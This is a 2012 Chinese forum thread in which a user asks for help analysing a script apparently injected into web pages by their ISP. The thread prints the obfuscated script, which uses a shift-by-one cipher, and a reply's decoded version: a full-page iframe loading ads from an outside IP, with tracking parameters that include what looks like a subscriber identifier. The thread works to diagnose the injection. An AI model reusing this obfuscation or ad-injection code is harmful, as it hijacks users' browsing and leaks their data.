ahlmkk
火狐狸
火狐狸
  • UID24522
  • 注册日期2008-06-09
  • 最后登录2022-10-30
  • 发帖数281
  • 经验64枚
  • 威望0点
  • 贡献值24点
  • 好评度4点
  • 社区居民
  • 忠实会员
阅读:2289回复:11

估计被电信耍流氓了,有没有哪位仁兄帮分析下这段脚本?

楼主#
更多 发布于:2012-07-11 08:25
现在上网的时候总被随机插入如下脚本,估计是电信在耍流氓,有没有那位仁兄帮分析下,多谢了


<script>var d="=iunm?=ifbe?=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#?gvodujpo!mpbeBuusjcvuf)*|wbs!g>epdvnfou/hfuFmfnfouCzJe)#g#*<wbs!tfswfs>#iuuq;0032:/259/31/84;91#<wbs!sfrvjsfe>#beje>311111'uddb>NUh6N{F{OEFxNkB>'vsjq>5724:937:'psmv>bIS1dEpwM36me4NvNUZ{MnOwcR>>'tqje>49526:187:'bsfb>84'ut>2452:77432#<jg)tfmg/epdvnfou/mpdbujpo>>xjoepx/epdvnfou/VSM!''!epdvnfou/cpez/dmjfouXjeui?>611!''!epdvnfou/cpez/dmjfouIfjhiu?>611*|g/tsd>tfswfs,#0b0t@g>betuzmf";function i(_,__){_+=__;var $="";for(var u=0;u<_.length;u++){var r=_.charCodeAt(u);$+=String.fromCharCode(r-1);}return $;} var c="`nto/iunm'#,sfrvjsfe,#'bpsmv>bIS1dEpwM{JyPT5yOEhvNUhvNUNzM2KmZ3WqenWWd3WzTX6nc1VvZYOxfB>>'q2bsn>481'q3bsn>611'q4bsn>21'q5bsn>6'q6bsn>4'q7bsn>2'bqqe>4'ibtDpvou>2'ibtXijufVtfs>2#<~fmtf|g/tsd>tfswfs,#0b0q@#,sfrvjsfe,#'qvtiGmbh>1#<~~=0tdsjqu?=0ifbe?=cpez!pompbe>#mpbeBuusjcvuf)*#!sjhiuNbshjo>1!upqNbshjo>1!mfguNbshjo>1!tdspmm>op?=jgsbnf!je>#g#!gsbnfCpsefs>1!xjeui>211&!ifjhiu>211&!tdspmmjoh>bvup!tsd>##?=0jgsbnf?=0cpez?=0iunm?";document.write(i(d,c));</script>
ahlmkk
火狐狸
火狐狸
  • UID24522
  • 注册日期2008-06-09
  • 最后登录2022-10-30
  • 发帖数281
  • 经验64枚
  • 威望0点
  • 贡献值24点
  • 好评度4点
  • 社区居民
  • 忠实会员
1楼#
发布于:2012-07-11 08:25
fang5566:换脚本,不如换DNS,免遭电信劫持,比如opendns或谷歌的dns回到原帖


呵呵 这个我明白
现在我就是想问一下这段脚本是什么内容
明显加过密的
有没有哪位仁兄知道怎么解?
ahlmkk
火狐狸
火狐狸
  • UID24522
  • 注册日期2008-06-09
  • 最后登录2022-10-30
  • 发帖数281
  • 经验64枚
  • 威望0点
  • 贡献值24点
  • 好评度4点
  • 社区居民
  • 忠实会员
2楼#
发布于:2012-07-11 08:25
问题是我不能确定是电信的问题啊
那个脚本是加密过的
连接的网页也打不开
ahlmkk
火狐狸
火狐狸
  • UID24522
  • 注册日期2008-06-09
  • 最后登录2022-10-30
  • 发帖数281
  • 经验64枚
  • 威望0点
  • 贡献值24点
  • 好评度4点
  • 社区居民
  • 忠实会员
3楼#
发布于:2012-07-11 08:25
fishcn:<html><head><script type="text/javascript">function loadAttribute(){var f=document.getElementById("f");var server="http://219.148.20.73:80";var required="adid=200000&tcca=MTg5MzEzNDEwMjA=&urip=461398269&orlu=aHR0cDovL25ld3MuMTYzLmNvbQ==&spid=3841590769&area=73&ts=1341966321";if(self.document.location==window.document.URL && document.body.clientWidth>=500 && document.body.clientHeight>=500){f.src=server+"/a/s?f=adstyle_msn.html&"+required+"&aorlu=aHR0cDovLzIxOS4xNDguMTguMTMyL1JlY2VpdmVVc2VySW5mb0UuYXNweA==&p1arm=370&p2arm=500&p3arm=10&p4arm=5&p5arm=3&p6arm=1&appd=3&hasCount=1&hasWhiteUser=1";}else{f.src=server+"/a/p?"+required+"&pushFlag=0";}}</script></head><body onload="loadAttribute()" rightMargin=0 topMargin=0 leftMargin=0 scroll=no><iframe id="f" frameBorder=0 width=100% height=100% scrolling=auto src=""></iframe></body></html>

yep.的确是弹广告的页面代码。
回到原帖

多谢这位仁兄,请问这是什么加密方法?
游客

返回顶部